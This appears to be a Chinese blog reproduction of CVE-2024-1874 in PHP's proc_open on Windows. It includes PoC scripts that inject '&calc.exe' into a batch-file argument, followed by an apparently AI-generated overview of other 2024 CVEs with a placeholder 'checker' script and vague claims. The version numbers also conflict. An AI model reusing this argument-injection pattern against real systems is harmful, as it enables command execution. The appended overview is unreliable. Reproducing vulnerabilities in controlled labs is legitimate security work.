PHP命令执行漏洞CVE-2024-1874复现

本文介绍了PHP8.2.9及更低版本中的CVE-2024-1874漏洞,允许攻击者通过proc_open函数执行恶意代码,包括调用外部程序如计算器,即使设置了bypass_shell选项。文章详细展示了漏洞利用方法和可能的修复措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2024-1874 PHP命令执行漏洞

影响版本

Affected versions
< 8.1.28
< 8.2.18
< 8.3.5
Patched versions
8.1.28
8.2.18
8.3.6

POC

创建一个文件test.php


<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes);
proc_close($proc);

随便创建一个.bat文件,如test.bat

echo test

然后在PHP 8.2.9nts版本下使用php test.php来执行test.php,成功RCE调起计算器。
在这里插入图片描述
即使在proc_open()函数中使用bypass shell选项,依旧RCE成功。

<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes, null, null, array("bypass_shell" => true));
proc_close($proc);

在这里插入图片描述

参考链接

https://mp.weixin.qq.com/s/jAeRY-XOKw8fmUDXT2ESNQ

### CVE-2024 漏洞详情 #### CVE-2024-38077 漏洞详情 CVE-2024-38077 是 Microsoft 发布的一个安全更新,涉及多个产品和服务的安全漏洞。此漏洞允许攻击者通过特定条件下的网络请求执行远程代码或导致拒绝服务。微软官方提供了详细的修复指南和技术支持文档[^1]。 ```python import requests def check_vulnerability(url): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', } try: response = requests.get(url, headers=headers) if "specific_pattern_in_response" in response.text: print("The system is vulnerable to CVE-2024-38077.") else: print("The system appears not to be affected by CVE-2024-38077.") except Exception as e: print(f"An error occurred: {e}") check_vulnerability('http://example.com') ``` #### Apache Tomcat 信息泄露漏洞CVE-2024-21733、CVE-2024-24549 和 CVE-2024-34750) 这些漏洞存在于 Apache Tomcat 的某些配置文件解析过程中,可能导致敏感信息泄露给未经授权的用户。受影响版本包括但不限于 Apache Tomcat 9.x 及更早版本。建议立即升级至最新稳定版以消除风险[^2]。 #### 网康科技 NS-ASG 应用安全网关 SQL 注入漏洞CVE-2024-3458、CVE-2024-3457、CVE-2024-3456) 这些漏洞影响了网康科技的应用安全网关设备,在未授权的情况下可以被用来执行任意 SQL 命令,从而读取或修改数据库内容。具体来说,`add_ikev2.php`, `config_ISCGroupNoCache.php`, `add_postlogin.php`, `config_Anticrack.php` 接口均受到影响。为了防止此类攻击的发生,应尽快应用厂商发布的补丁程序并加强输入验证措施[^3]。 ### 复现方法概述 对于上述提到的各种类型的 CVE-2024 漏洞复现通常需要满足以下几个前提: 1. **环境搭建**:创建一个受控测试环境中部署易受攻击的服务实例; 2. **工具准备**:准备好必要的渗透测试工具集,比如 Burp Suite 或 OWASP ZAP; 3. **脚本编写**:根据公开资料开发针对性的有效载荷(Payload),用于触发潜在缺陷; 4. **日志记录**:在整个实验期间保持良好的数据收集习惯以便后续分析。 请注意,实际操作前务必获得合法授权,并严格遵守法律法规!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值